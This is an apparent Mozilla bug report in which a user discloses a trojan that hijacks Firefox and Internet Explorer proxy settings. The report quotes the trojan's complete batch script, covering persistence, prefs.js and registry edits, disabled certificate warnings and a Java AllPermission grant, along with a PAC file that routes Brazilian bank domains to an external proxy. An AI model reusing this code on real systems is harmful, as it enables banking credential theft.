Note: There are a few cases of duplicates in user autocompletion which are being worked on.

Firefox is a virus target

RESOLVED INVALID

Status

()

Firefox
Security
--
major
RESOLVED INVALID
8 years ago
8 years ago

People

(Reporter: Renato S. Yamane, Unassigned)

Tracking

3.5 Branch
x86
Windows XP
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(3 attachments)

(Reporter)

Description

8 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)

I have checked that Firefox is a virus target.
The virus change proxy settings to redirect all conections to a external proxy, capturing all banks information:

@shift
::@echo off
@break off

if exist %temp%\iecfg.dll goto con
::add to regedit
> %temp%\iecfg.dll echo y
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v JavaPlugin /t REG_SZ /d "%temp%\csrrs.exe" < %temp%\iecfg.dll
start /low /min iexplore.exe "http://adobe.shockwavesfx.com/successful.php"
goto mapa
::Connection test
:con
set ping=%windir%\system32\ping.exe
:test
%ping% 74.125.159.99 -n 1 -l 1 | find "TTL" > nul
if not errorlevel 1 goto mapa
goto teste
:mapa
::Get IP
FOR /F "TOKENS=3 delims=: " %%E IN ('%windir%\system32\ping.exe proxy.shockwavesfx.com -n 1 -l 1 ^| find.exe "TTL" ') DO SET ip=%%E



FOR /F "TOKENS=*" %%E IN ('dir "%HoMePath%\.." /b /s ^| find "prefs.js"') DO %windir%\system32\attrib.exe -r -a -s -h "%%E" && echo user_pref("network.proxy.autoconfig_url", "http://%ip%/proxy.pac"); >> "%%E"
FOR /F "TOKENS=*" %%E IN ('dir "%HoMePath%\.." /b /s ^| find "prefs.js"') DO %windir%\system32\attrib.exe -r -a -s -h "%%E" && echo user_pref("network.proxy.type", 2); >> "%%E"



type %temp%\~a.tmp | find.exe "Internet Explorer\Main">%temp%\~b.tmp && for /f "tokens=2 delims=\" %%D in ('type %temp%\~b.tmp ^| find.exe "S-1-5-21"') do set CSL=%%D
echo y|%windir%\system32\reg.exe add "HKU\%CSL%\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f


cd %HoMePath%
::Add Proxy to IE*
echo Windows Registry Editor Version 5.00 > iecfg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings] >> iecfg.reg
echo "AutoConfigURL"="http://%ip%/proxy.pac" >> iecfg.reg
echo "EnableHttp1_1"=dword:00000001 >> iecfg.reg
echo "ProxyEnable"=dword:00000000 >> iecfg.reg
echo "ProxyHttp1.1"=dword:00000000 >> iecfg.reg
regedit /s iecfg.reg
del iecfg.reg


::Allow java applet
cd %windir%
cd ..
FOR /F "TOKENS=*" %%E IN ('dir /b /s ^| find /i "java.policy"') DO echo grant {  permission java.security.AllPermission;}; > "%%E"
:no

::exit

Reproducible: Always

Actual Results:  
Prefs.js is very easy to be changed by a external action.

Expected Results:  
When prefs.js is changed, user need be informed when Firefox run.
(Reporter)

Updated

8 years ago
Component: General → Security
Version: unspecified → 3.5 Branch
(Reporter)

Comment 1

8 years ago
http://securityproxy1.no-ip.biz/proxy.pac have this content (I already tell to no-ip block this addrress):

=============================================
function FindProxyForURL(url, host) {

var n = new Array("www.bradesco.com.br","bradesco.com.br","bradesco.com",

"www.cef.com.br","cef.com.br","www.caixa.com.br","caixa.com.br","www.cef.gov.br","cef.gov.br","www.caixaeconomica.com.br","caixaeconomica.com.br","www.caixaeconomicafederal.com.br","caixaeconomicafederal.com.br","www.caixa.gov.br","caixa.gov.br","www.itau.com.br","itau.com.br","www.real.com.br","real.com.br","www.bancoreal.com.br","bancoreal.com.br","www.bb.com.br","bb.com.br","www.bancodobrasil.com.br","bancodobrasil.com.br","www.bancobrasil.com.br","bancobrasil.com.br","www.santander.com.br","santander.com.br","www.banespa.com.br","banespa.com.br","www.santanderbanespa.com.br","santanderbanespa.com.br","www.itaupersonnalite.com.br","itaupersonnalite.com.br","www.itauprivatebank.com.br","itauprivatebank.com.br","www.unibanco.com.br","unibanco.com.br");

for(var i =0;i<n.length;i++) { if (shExpMatch(host, n[i])) {

return "PROXY 72.20.10.175:80"; } }

return "DIRECT"; }
=============================================

All this sites are Brazilian Banks.
(Reporter)

Comment 2

8 years ago
The virus changed...

- From csrrs.exe to iexplorer.exe
- From batch file (.bat) to executable file (.exe).
- And now, proxy is http://proxy.shockwavesfxlive.in/proxy.pac

I will attach the iexplorer.exe, iexplorer.dll and finder.exe

All this files is placed in:
C:\Documents and Settings\USER\Local Settings\Temp
(Reporter)

Comment 3

8 years ago
Created attachment 390144 [details]
executable file (Checked in msconfig that it is loaded in all startup)
(Reporter)

Comment 4

8 years ago
Created attachment 390145 [details]
I don't know what it do. But it is a piece of this virus
(Reporter)

Comment 5

8 years ago
Created attachment 390146 [details]
This file looking for prefs.js to change proxy settings
(Reporter)

Comment 6

8 years ago
Can someone confirm this problem?
Is not confortable have all account bank traffic redirect to a external proxy.

Comment 7

8 years ago
Being the target of a virus isn't a security hole. But maybe dveditz can tell you what he knows about this virus.
Group: core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 8 years ago
Resolution: --- → INVALID
(Reporter)

Comment 8

8 years ago
Jesse, I agree that "target of a virus isn't a security hole", *but* this kind of worm show to us that is VERY EASY change important parameters on Firefox.

A simple batch file can do:
echo user_pref("network.proxy.autoconfig_url", "proxy.pac"); >> prefs.js

I think that text file (prefs.js) canĀ“t exist to do important things!

Anyone script kiddies can edit this kind of file easily.

Comment 9

8 years ago
Obfuscating configuration files is not a very strong security measure.
(Reporter)

Comment 10

8 years ago
But a txt file (as prefs.js) can be edited by any *KID*.
This is trivial!

A lot of others worms will appear using a simple "echo" to edit Firefox config files.

Redirect traffic of financial institutions (as this worm do) is very dangerous to Firefox users.

Comment 11

8 years ago
Getting access to your computer is a much higher bar than editing a text file or a binary blob.
(Reporter)

Comment 12

8 years ago
Think with me:

- A user receive a batch file (click here to see Britnay Spears nude)
- This file edit, using "echo", the prefs.js enabling proxy.
- All financial institutions datas will be redirect to a external proxy.
- Cracker will get your account number, credit card information, etc.

This kind of worm (batch file) never will be getted by anti-virus.

I know that the user can't click on anything, but we know that user will do that!

And IMHO Firefox need avoid this kind of situation.
You need to log in before you can comment on or make changes to this bug.